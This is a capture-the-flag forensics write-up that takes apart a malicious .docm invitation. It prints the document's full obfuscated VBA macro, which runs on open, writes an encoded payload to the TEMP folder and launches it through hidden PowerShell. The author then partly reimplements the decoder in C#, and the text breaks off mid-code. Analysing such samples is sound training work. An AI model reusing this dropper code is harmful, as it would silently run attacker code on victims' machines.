Hack The Boo - Forensics - Halloween Invitation

Difficulty: Easy

An email notification pops up. It’s from your theater group. Someone decided to throw a party. The invitation looks awesome, but there is something suspicious about this document. Maybe you should take a look before you rent your banana costume.

We are provided with a macro-enabled word document, invitation.docm.

.docm files are .docx files, but with macros enabled. If this is a simple invitation, it shouldn’t need macros, so we’ll likely find some malware hidden within the macros of this document.

.docm and .docx files are actually types of Open Document Format files, and are actually zip files containing various components of their files inside. We can use any “zip” program to unzip them and explore their contents.

Once extracted, we can find the compiled macros in invitation.docm/word/vbaProject.bin. These macros use Visual Basic for Applications (VBA), and we’ll need to use a tool to extract them so that we can see them. I chose to use oletools.

sudo -H pip install -U oletools[full]

The output of the following command will show us the macro code:

olevba invitation.docm/word/vbaProject.bin -c --decode

I copied and pasted that code from my terminal window into a text editor for analysis.

Sub AutoOpen()
    odhsjwpphlxnb
    Call lmavedb
End Sub

Private Sub odhsjwpphlxnb()
    Dim bnhupraoau As String
    CreateObject("WScript.Shell").currentdirectory = Environ("TEMP")
    bnhupraoau = sryivxjsdncj()
    dropPath = Environ("TEMP")
    Set rxnnvnfqufrzqfhnff = CreateObject(uxdufnkjlialsyp("53637269707469") & uxdufnkjlialsyp("6e672e46696c6553797374656d4f626a656374"))
    Set dfdjqgaqhvxxi = rxnnvnfqufrzqfhnff.CreateTextFile(dropPath & uxdufnkjlialsyp("5c68697374") & uxdufnkjlialsyp("6f72792e62616b"), True)
    dfdjqgaqhvxxi.Write bnhupraoau
    dfdjqgaqhvxxi.Close
End Sub

Private Function wdysllqkgsbzs(strBytes) As String
    Dim aNumbers
    Dim fxnrfzsdxmcvranp As String
    Dim iIter
    fxnrfzsdxmcvranp = ""
    aNumbers = Split(strBytes)
    For iIter = LBound(aNumbers) To UBound(aNumbers)
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + Chr(aNumbers(iIter))
    Next
    wdysllqkgsbzs = fxnrfzsdxmcvranp
End Function

Private Function okbzichkqtto() As String
    Dim fxnrfzsdxmcvranp As String
    fxnrfzsdxmcvranp = ""
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3734203635203636203132322036352036382034382036352037342031") & uxdufnkjlialsyp("31392036352035312036352036382039392036352037362031303320363520353120363520363820383120363520373620313033"))
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("363520313230203635203638203130") & uxdufnkjlialsyp("37203635203739203635203635203131372036352036382038352036352037372031303320363520353420363520363820313033203635203737203635203635203532"))
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3635203638203635203635203734") & uxdufnkjlialsyp("20313139203635203535203635203637203831203635203937203831203635203537203635203637203939203635203930203635203635203438203635203638203737"))
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3635203839203130332036362031303620363520373120373720363520373820313033203636203130372036352036") & uxdufnkjlialsyp("37203438203635203737203635203635203438203635203638203737203635203930"))
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("313033203635203132312036352036382038312036352037372036352036352035") & uxdufnkjlialsyp("33203635203637203438203635203738203131392036362031303820363520373120363920363520373720313033203635"))
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("313232203635203731203639203635203737203130332036362031303620363520363720393920363520373920313139203635203130372036352037322036352036352038302038312036352031") & uxdufnkjlialsyp("3130203635"))
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("373120313033203635203130302036352036362034382036352037322036352036352037392031303320") & uxdufnkjlialsyp("36352031313820363520363720353620363520373420313139203635203535203635203637203831"))
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("36352031303020313033203635203537203635203639203130372036352039382031303320363620353020363520373120353620363520393720313139203636203130382036352036372034") & uxdufnkjlialsyp("38203635203835"))
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("31303320363620313038203635203732203737203635203130302036352036362037382036352037312038352036352031303020363520363620313131203635203731203536203635203930") & uxdufnkjlialsyp("203635203635"))
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("313033203635203637203438203635203836203831203636203132322036352037312038") & uxdufnkjlialsyp("35203635203831203130332036362031303420363520373220373720363520393720383120363620313036203635"))
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("373020363520363520383920383120363620313231203635203732203737203635203937203831203636") & uxdufnkjlialsyp("2031313720363520373120393920363520373320363520363520313136203635203730203835203635"))
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3939203130332036362031313220363520363720363520363520373420363520363620313139203635203637203831203635203939203131392036352031313820") & uxdufnkjlialsyp("3635203731203831203635203738203635"))
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("363520313232203635203731203733203635") & uxdufnkjlialsyp("20383920313139203636203130362036352036382038392036352039302036352036352031303320363520363720343820363520383320363520363620313038"))
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("36352037312036392036352039302036352036362031303820363520373220373320363520393920313139203635") & uxdufnkjlialsyp("20313033203635203639203635203635203130312031313920363520313035203635203639"))
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("363920363520313030203831203636203438203635203731203130332036352039") & uxdufnkjlialsyp("38203131392036362031323120363520373120313037203635203130312031303320363620313034203635203732203831"))
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("363520393720383120363620") & uxdufnkjlialsyp("313138203635203731203532203635203733203130332036352035372036352036372038312036352039372038312036362035372036352036382031313520363520313030"))
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("313139203636203131312036352037312031303720363520393820363520363620313038") & uxdufnkjlialsyp("2036352036372036352036352037352036352036352031303720363520373220383120363520393920313033203636"))
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("34392036352037312038352036352037352038312036362035352036352036372038312036352038392031313920363520353720363520363720313033203635203833203831203636203131") & uxdufnkjlialsyp("37203635203732"))
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("38392036352039382031313920363620313134203635203731203835203635203736203831203636203833") & uxdufnkjlialsyp("20363520373120383520363520393920313139203636203438203635203639203438203635203930"))
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("38312036362034382036352037312031303320363520393820313139203636203130372036352036372036352036352037362038312036362038362036352037322037") & uxdufnkjlialsyp("37203635203930203831203636203637"))
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("363520373120363920363520393920313139203636203131322036352037312037372036352038352036352036362031303420363520") & uxdufnkjlialsyp("37322037332036352039392031313920363620313132203635203731"))
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("35322036352039302031313920363520313033203635203637203438203635203836203831203636203132312036352037312031303720363520373320363520363520313037203635203732203635") & uxdufnkjlialsyp("203635"))
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("37342036352036362031323220363520363720") & uxdufnkjlialsyp("35362036352037372036352036352034382036352036382037372036352039302031303320363520313231203635203638203831203635203737203635203635"))
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("353320363520363720363520363520373620383120363620373320363520373120383520363520383920383120363620313037203635") & uxdufnkjlialsyp("2037312038352036352039392031303320363620313232203635203637"))
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("36352036352038312036352036362035352036352036372037332036352038") & uxdufnkjlialsyp("3120383120363620343920363520373220383120363520393720363520363620313138203635203732203733203635203937"))
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("383120363620353420363520373120363920363520") & uxdufnkjlialsyp("313030203635203636203131322036352037312035362036352039382031303320363520313035203635203638203438203635203734203635203636"))
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("31313220363520373220343820363520") & uxdufnkjlialsyp("37352038312036352035352036352037312031303720363520393020313033203635203130332036352036372031303320363520373420363520363620313036203635"))
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3637") & uxdufnkjlialsyp("20363520363520373620383120363620313137203635203731203835203635203733203635203635203131302036352036392035322036352039382031313920363620313137203635203731203835"))
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("363520373420313139203635203131322036352036372036352036352031303120313139203635203130372036352037322037332036352038302038312036362031313220363520") & uxdufnkjlialsyp("373120383520363520313031"))
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("36352036352031303320") & uxdufnkjlialsyp("363520363720383120363520383920313139203635203130332036352036372034382036352038322038312036362031323120363520373220373320363520393820313139203636"))
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3132312036352036392036392036352038392031313920363620343820363520373120313037203635203938203131392036362031313720363520") & uxdufnkjlialsyp("363720363520363520383520313139203636203438203635"))
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3731203536203635203939203635203635203130332036352036372034382036352038322038312036362031323120") & uxdufnkjlialsyp("36352037322037332036352039382031313920363620313231203635203730203839"))
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("363520383920383120363620313231203635203731203130372036352038392038") & uxdufnkjlialsyp("31203636203130352036352037312031313920363520393020383120363520313033203635203731203835203635203739"))
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3131392036352031303720363520373220373320363520383020383120") & uxdufnkjlialsyp("3636203830203635203732203835203635203130302036352036352031313620363520373020373720363520313030203635203636"))
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3132312036352037") & uxdufnkjlialsyp("31203130372036352039382031303320363620313130203635203637203635203635203736203831203636203734203635203731203532203635203939203635203636203439203635"))
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("37322038312036352038342031313920363620313035203635203731203131312036352039302038312036362031303620363520373220383120363520373320363520363520313037203635203732") & uxdufnkjlialsyp("203733"))
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3635203739203131392036352031303720363520373220383120363520383020383120363620") & uxdufnkjlialsyp("373420363520373120353220363520313030203130332036362031313820363520373120313135203635203930"))
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("38312036352031313620363520373020373320363520393020383120363620313232203635203732203831203635203834203831203636203130") & uxdufnkjlialsyp("3820363520373220383120363520393720363520363620313138"))
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3635203731203831203635203733") & uxdufnkjlialsyp("20363520363520313136203635203730203835203635203939203130332036362031313220363520363720363520363520373420363520363620313139203635203637"))
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3831203635203939203131392036352031313820363520363820393920363520393020383120363620313034203635203638203733203635203737203131392036362031303420363520363820373320") & uxdufnkjlialsyp("3635"))
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("38392031313920363520313033203635203637203438203635203834203831203636203130382036352037322038312036352039372036352036362031313820363520373120") & uxdufnkjlialsyp("3831203635203733203635"))
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("363620383120") & uxdufnkjlialsyp("36352036392035362036352038352031313920363620383520363520363720363520363520373620383120363620373320363520373120383520363520383920383120363620313037203635"))
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("37312038352036352039392031303320363620313232203635203637203635203635203831203635203636203535") & uxdufnkjlialsyp("203635203637203733203635203831203831203636203439203635203732203831203635"))
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3937203635203636203131382036352037322037332036352039372038312036362035342036352037312036392036352031303020363520363620313132203635203731203536203635203938") & uxdufnkjlialsyp("20313033"))
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3635203130352036352036382034382036352037342036352036362031313220363520373220343820363520373320363520363520") & uxdufnkjlialsyp("3131362036352036392037332036352039382031313920363620313037"))
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("363520373220") & uxdufnkjlialsyp("3130372036352037332036352036352031313120363520373020313135203635203835203131392036362035332036352037322037372036352031303020363520363620313038203635203731"))
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3438203635") & uxdufnkjlialsyp("203736203130332036362038352036352037312038352036352031303120363520363620343820363520363720353220363520383220383120363620313137203635203731203737203635203938"))
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3131392036362031303720363520373120313037203635203938203130332036362031313020363520373020343820363520373920313033203635203534203635203730203835203635") & uxdufnkjlialsyp("203836203635203636"))
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("37312036352036382031303320363520373620313033203636203732203635203731") & uxdufnkjlialsyp("20383520363520313030203635203636203637203635203732203130372036352031303020363520363620313038203635"))
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3732203737203635203735203635203635203130372036352037312038352036352037352031313920363520313037203635203732203733203635203735203831203635") & uxdufnkjlialsyp("20313033203635203637203438"))
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("36352039372031303320363620") & uxdufnkjlialsyp("3131382036352037312031303720363520393820313033203635203130332036352036372039392036352037332036352036352031313020363520363720313037203635"))
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("313032") & uxdufnkjlialsyp("20383120363520313033203635203732203737203635203938203635203636203130382036352037312038352036352039392036352036352031303320363520363820363520363520373620313033"))
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("363520353220363520373220343820363520383320363520363620") & uxdufnkjlialsyp("3835203635203639203733203635203130312031313920363520343920363520373220383520363520393920363520363520313232203635"))
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("373220373320363520383820313139203635203132322036352036382038312036352037382038") & uxdufnkjlialsyp("31203636203533203635203730203536203635203938203831203635203438203635203731203737203635"))
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("393920313033203635203131392036352036382038352036352031303220383120") & uxdufnkjlialsyp("3635203631"))
    okbzichkqtto = fxnrfzsdxmcvranp
End Function

Private Function sryivxjsdncj() As String
    Dim fxnrfzsdxmcvranp As String
    fxnrfzsdxmcvranp = ""
    fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + okbzichkqtto()
    sryivxjsdncj = fxnrfzsdxmcvranp
End Function

Sub lmavedb()
    dropPath = Environ("TEMP")
    Set rxnnvnfqufrzqfhnff = CreateObject(uxdufnkjlialsyp("536372697074696e672e46696c6553797374") & uxdufnkjlialsyp("656d4f626a656374"))
    Set ktmlmpc = rxnnvnfqufrzqfhnff.OpenTextFile(dropPath & uxdufnkjlialsyp("5c68") & uxdufnkjlialsyp("6973746f72792e62616b"))
    secret = ktmlmpc.ReadAll
    ktmlmpc.Close
    Code = "powershell -WindowStyle hidden -e """ & secret
    x = Shell(Code, 1)
End Sub

Function uxdufnkjlialsyp(ByVal tiyrahvbz As String) As String
    Dim nqjveawetp As Long
    For nqjveawetp = 1 To Len(tiyrahvbz) Step 2
    uxdufnkjlialsyp = uxdufnkjlialsyp & Chr$(Val("&H" & Mid$(tiyrahvbz, nqjveawetp, 2)))
    Next nqjveawetp
End Function

The last function - uxdufnkjlialsyp - was actually in a separate file, but I appended it to the end of this file for easier analysis.

We can see that the extracted code involves quite a bit of obfuscation to hide it’s true purpose, so it looks like we are on the right track. The AutoOpen() subroutine would trigger the rest of the code to run.

I am not as familiar with Visual Basic, or VBA, so after a few attempts to get blocks of this code to run in Visual Studio (with dangerous parts commented out), I decided instead to re-write the code in a language that I am more familliar with - C#. This is what I came up with:

using System;
using System.Text;

string DecodeBase64(string input)
{
    byte[] data = Convert.FromBase64String(input);
    return Encoding.UTF8.GetString(data);
}

string ConvertHexToCharacterCodes(string input)
{
    StringBuilder returnMe = new StringBuilder();
    // For each 2 characters in the input, parse them as an int, and then convert that to a character
    for(int x = 0; x < input.Length; x+=2)
    {
        // Get a chunk of 2 characters
        string section = input.Substring(x,2);

        // Parse them as an int
        byte sectionInt = byte.Parse(section, System.Globalization.NumberStyles.HexNumber);

        // Convert to characters = equivalent of VBA's Chr() function.
        string parsedChars = System.Text.Encoding.ASCII.GetString(new byte[] { sectionInt });

        returnMe.Append(parsedChars);
    }
    return returnMe.ToString();
}

string ConvertCharacterCodesToStrings(string input)
{
    // This will receive a string containing ANSI character codes, space separated.

    string[] explodedString = input.Split(' ');

    StringBuilder returnMe = new StringBuilder();

    foreach(string s in explodedString)
    {
        //int parsedCharCode = int.Parse(s);
        byte parsedCharCodeByte = byte.Parse(s);
        string parsedChar = System.Text.Encoding.ASCII.GetString(new byte[] { parsedCharCodeByte });
        returnMe.Append(parsedChar);
    }
    return returnMe.ToString();
}

string payload1 = "";
payload1 = payload1 + ConvertCharacterCodesToStrings(ConvertHexToCharacterCodes("3734203635203636203132322036352036382034382036352037342031") + ConvertHexToCharacterCodes("31392036352035312036352036382039392036352037362031303320363520353120363520363820383120363520373620313033"));
payload1 = payload1 + ConvertCharacterCodesToStrings(ConvertHexToCharacterCodes("363520313230203635203638203130") + ConvertHexToCharacterCodes("37203635203739203635203635203131372036352036382038352036352037372031303320363520353420363520363820313033203635203737203635203635203532"));
payload1 = payload1 + ConvertCharacterCodesToStrings(ConvertHexToCharacterCodes("3635203638203635203635203734") + ConvertHexToCharacterCodes("20313139203635203535203635203637203831203635203937203831203635203537203635203637203939203635203930203635203635203438203635203638203737"));
payload1 = payload1 + ConvertCharacterCodesToStrings(ConvertHexToCharacterCodes("3635203839203130332036362031303620363520373120373720363520373820313033203636203130372036352036") + ConvertHexToCharacterCodes("37203438203635203737203635203635203438203635203638203737203635203930"));
payload1 = payload1 + ConvertCharacterCodesToStrings(ConvertHexToCharacterCodes("313033203635203132312036352036382038312036352037372036352036352035") + ConvertHexToCharacterCodes("33203635203637203438203635203738203131392036362031303820363520373120363920363520373720313033203635"));
payload1 = payload1 + ConvertCharacterCodesToStrings(ConvertHexToCharacterCodes("313232203635203731203639203635203737203130332036362031303620363520363720393920363520373920313139203635203130372036352037322036352036352038302038312036352031") + ConvertHexToCharacterCodes("3130203635"));
payload1 = payload1 + ConvertCharacterCodesToStrings(ConvertHexToCharacterCodes("373120313033203635203130302036352036362034382036352037322036352036352037392031303320") + ConvertHexToCharacterCodes("36352031313820363520363720353620363520373420313139203635203535203635203637203831"));
payload1 = payload1 + ConvertCharacterCodesToStrings(ConvertHexToCharacterCodes("36352031303020313033203635203537203635203639203130372036352039382031303320363620353020363520373120353620363520393720313139203636203130382036352036372034") + ConvertHexToCharacterCodes("38203635203835"));
payload1 = payload1 + ConvertCharacterCodesToStrings(ConvertHexToCharacterCodes("31303320363620313038203635203732203737203635203130302036352036362037382036352037312038352036352031303020363520363620313131203635203731203536203635203930") + ConvertHexToCharacterCodes("203635203635"));
payload1 = payload1 + ConvertCharacterCodesToStrings(ConvertHexToCharacterCodes("313033203635203637203438203635203836203831203636203132322036352037312038") + ConvertHexToCharacterCodes("35203635203831203130332036362031303420363520373220373720363520393720383120363620313036203635"));
payload1 = payload1 + ConvertCharacterCodesToStrings(ConvertHexToCharacterCodes("373020363520363520383920383120363620313231203635203732203737203635203937203831203636") + ConvertHexToCharacterCodes("2031313720363520373120393920363520373320363520363520313136203635203730203835203635"));
payload1 = payload1 + ConvertCharacterCodesToStrings(ConvertHexToCharacterCodes("3939203130332036362031313220363520363720363520363520373420363520363620313139203635203637203831203635203939203131392036352031313820") + ConvertHexToCharacterCodes("3635203731203831203635203738203635"));
payload1 = payload1 + ConvertCharacterCodesToStrings(ConvertHexToCharacterCodes("363520313232203635203731203733203635") + ConvertHexToCharacterCodes("20383920313139203636203130362036352036382038392036352039302036352036352031303320363520363720343820363520383320363520363620313038"));
payload1 = payload1 + ConvertCharacterCodesToStrings(ConvertHexToCharacterCodes("36352037312036392036352039302036352036362031303820363520373220373320363520393920313139203635") + ConvertHexToCharacterCodes("20313033203635203639203635203635203130312031313920363520313035203635203639"));
payload1 = payload1 + ConvertCharacterCodesToStrings(ConvertHexToCharacterCodes("363920363520313030203831203636203438203635203731203130332036352039") + ConvertHexToCharacterCodes("38203131392036362031323120363520373120313037203635203130312031303320363620313034203635203732203831"));
payload1 = payload1 + ConvertCharacterCodesToStrings(ConvertHexToCharacterCodes("363520393720383120363620") + ConvertHexToCharacterCodes("313138203635203731203532203635203733203130332036352035372036352036372038312036352039372038312036362035372036352036382031313520363520313030"));
payload1 = payload1 + ConvertCharacterCodesToStrings(ConvertHexToCharacterCodes("313139203636203131312036352037312031303720363520393820363520363620313038") + ConvertHexToCharacterCodes("2036352036372036352036352037352036352036352031303720363520373220383120363520393920313033203636"));
payload1 = payload1 + ConvertCharacterCodesToStrings(ConvertHexToCharacterCodes("34392036352037312038352036352037352038312036362035352036352036372038312036352038392031313920363520353720363520363720313033203635203833203831203636203131") + ConvertHexToCharacterCodes("37203635203732"));
payload1 = payload1 + ConvertCharacterCodesToStrings(ConvertHexToCharacterCodes("38392036352039382031313920363620313134203635203731203835203635203736203831203636203833") + ConvertHexToCharacterCodes("20363520373120383520363520393920313139203636203438203635203639203438203635203930"));
payload1 = payload1 + ConvertCharacterCodesToStrings(ConvertHexToCharacterCodes("38312036362034382036352037312031303320363520393820313139203636203130372036352036372036352036352037362038312036362038362036352037322037") + ConvertHexToCharacterCodes("37203635203930203831203636203637"));
payload1 = payload1 + ConvertCharacterCodesToStrings(ConvertHexToCharacterCodes("363520373120363920363520393920313139203636203131322036352037312037372036352038352036352036362031303420363520") + ConvertHexToCharacterCodes("37322037332036352039392031313920363620313132203635203731"));
payload1 = payload1 + ConvertCharacterCodesToStrings(ConvertHexToCharacterCodes("35322036352039302031313920363520313033203635203637203438203635203836203831203636203132312036352037312031303720363520373320363520363520313037203635203732203635") + ConvertHexToCharacterCodes("203635"));
payload1 = payload1 + ConvertCharacterCodesToStrings(ConvertHexToCharacterCodes("37342036352036362031323220363520363720") + ConvertHexToCharacterCodes("35362036352037372036352036352034382036352036382037372036352039302031303320363520313231203635203638203831203635203737203635203635"));
payload1 = payload1 + ConvertCharacterCodesToStrings(ConvertHexToCharacterCodes("353320363520363720363520363520373620383120363620373320363520373120383520363520383920383120363620313037203635") + ConvertHexToCharacterCodes("2037312038352036352039392031303320363620313232203635203637"));
payload1 = payload1 + ConvertCharacterCodesToStrings(ConvertHexToCharacterCodes("36352036352038312036352036362035352036352036372037332036352038") + ConvertHexToCharacterCodes("3120383120363620343920363520373220383120363520393720363520363620313138203635203732203733203635203937"));
payload1 = payload1 + ConvertCharacterCodesToStrings(ConvertHexToCharacterCodes("383120363620353420363520373120363920363520") + ConvertHexToCharacterCodes("313030203635203636203131322036352037312035362036352039382031303320363520313035203635203638203438203635203734203635203636"));
payload1 = payload1 + ConvertCharacterCodesToStrings(ConvertHexToCharacterCodes("31313220363520373220343820363520") + ConvertHexToCharacterCodes("37352038312036352035352036352037312031303720363520393020313033203635203130332036352036372031303320363520373420363520363620313036203635"));
payload1 = payload1 + ConvertCharacterCodesToStrings(ConvertHexToCharacterCodes("3637") + ConvertHexToCharacterCodes("20363520363520373620383120363620313137203635203731203835203635203733203635203635203131302036352036392035322036352039382031313920363620313137203635203731203835"));
payload1 = payload1 + ConvertCharacterCodesToStrings(ConvertHexToCharacterCodes("363520373420313139203635203131322036352036372036352036352031303120313139203635203130372036352037322037332036352038302038312036362031313220363520") + ConvertHexToCharacterCodes("373120383520363520313031"));
payload1 = payload1 + ConvertCharacterCodesToStrings(ConvertHexToCharacterCodes("36352036352031303320") + ConvertHexToCharacterCodes("363520363720383120363520383920313139203635203130332036352036372034382036352038322038312036362031323120363520373220373320363520393820313139203636"));
payload1 = payload1 + ConvertCharacterCodesToStrings(ConvertHexToCharacterCodes("3132312036352036392036392036352038392031313920363620343820363520373120313037203635203938203131392036362031313720363520") + ConvertHexToCharacterCodes("363720363520363520383520313139203636203438203635"));
payload1 = payload1 + ConvertCharacterCodesToStrings(ConvertHexToCharacterCodes("3731203536203635203939203635203635203130332036352036372034382036352038322038312036362031323120") + ConvertHexToCharacterCodes("36352037322037332036352039382031313920363620313231203635203730203839"));
payload1 = payload1 + ConvertCharacterCodesToStrings(ConvertHexToCharacterCodes("363520383920383120363620313231203635203731203130372036352038392038") + ConvertHexToCharacterCodes("31203636203130352036352037312031313920363520393020383120363520313033203635203731203835203635203739"));
payload1 = payload1 + ConvertCharacterCodesToStrings(ConvertHexToCharacterCodes("3131392036352031303720363520373220373320363520383020383120") + ConvertHexToCharacterCodes("3636203830203635203732203835203635203130302036352036352031313620363520373020373720363520313030203635203636"));
payload1 = payload1 + ConvertCharacterCodesToStrings(ConvertHexToCharacterCodes("3132312036352037") + ConvertHexToCharacterCodes("31203130372036352039382031303320363620313130203635203637203635203635203736203831203636203734203635203731203532203635203939203635203636203439203635"));
payload1 = payload1 + ConvertCharacterCodesToStrings(ConvertHexToCharacterCodes("37322038312036352038342031313920363620313035203635203731203131312036352039302038312036362031303620363520373220383120363520373320363520363520313037203635203732") + ConvertHexToCharacterCodes("203733"));
payload1 = payload1 + ConvertCharacterCodesToStrings(ConvertHexToCharacterCodes("3635203739203131392036352031303720363520373220383120363520383020383120363620") + ConvertHexToCharacterCodes("373420363520373120353220363520313030203130332036362031313820363520373120313135203635203930"));
payload1 = payload1 + ConvertCharacterCodesToStrings(ConvertHexToCharacterCodes("38312036352031313620363520373020373320363520393020383120363620313232203635203732203831203635203834203831203636203130") + ConvertHexToCharacterCodes("3820363520373220383120363520393720363520363620313138"));
payload1 = payload1 + ConvertCharacterCodesToStrings(ConvertHexToCharacterCodes("3635203731203831203635203733") + ConvertHexToCharacterCodes("20363520363520313136203635203730203835203635203939203130332036362031313220363520363720363520363520373420363520363620313139203635203637"));
payload1 = payload1 + ConvertCharacterCodesToStrings(ConvertHexToCharacterCodes("3831203635203939203131392036352031313820363520363820393920363520393020383120363620313034203635203638203733203635203737203131392036362031303420363520363820373320") + ConvertHexToCharacterCodes("3635"));
payload1 = payload1 + ConvertCharacterCodesToStrings(ConvertHexToCharacterCodes("38392031313920363520313033203635203637203438203635203834203831203636203130382036352037322038312036352039372036352036362031313820363520373120") + ConvertHexToCharacterCodes("3831203635203733203635"));
payload1 = payload1 + ConvertCharacterCodesToStrings(ConvertHexToCharacterCodes("363620383120") + ConvertHexToCharacterCodes("36352036392035362036352038352031313920363620383520363520363720363520363520373620383120363620373320363520373120383520363520383920383120363620313037203635"));
payload1 = payload1 + ConvertCharacterCodesToStrings(ConvertHexToCharacterCodes("37312038352036352039392031303320363620313232203635203637203635203635203831203635203636203535") + ConvertHexToCharacterCodes("203635203637203733203635203831203831203636203439203635203732203831203635"));
payload1 = payload1 + ConvertCharacterCodesToStrings(ConvertHexToCharacterCodes("3937203635203636203131382036352037322037332036352039372038312036362035342036352037312036392036352031303020363520363620313132203635203731203536203635203938") + ConvertHexToCharacterCodes("20313033"));
payload1 = payload1 + ConvertCharacterCodesToStrings(ConvertHexToCharacterCodes("3635203130352036352036382034382036352037342036352036362031313220363520373220343820363520373320363520363520") + ConvertHexToCharacterCodes("3131362036352036392037332036352039382031313920363620313037"));
payload1 = payload1 + ConvertCharacterCodesToStrings(ConvertHexToCharacterCodes("363520373220") + ConvertHexToCharacterCodes("3130372036352037332036352036352031313120363520373020313135203635203835203131392036362035332036352037322037372036352031303020363520363620313038203635203731"));
payload1 = payload1 + ConvertCharacterCodesToStrings(ConvertHexToCharacterCodes("3438203635") + ConvertHexToCharacterCodes("203736203130332036362038352036352037312038352036352031303120363520363620343820363520363720353220363520383220383120363620313137203635203731203737203635203938"));
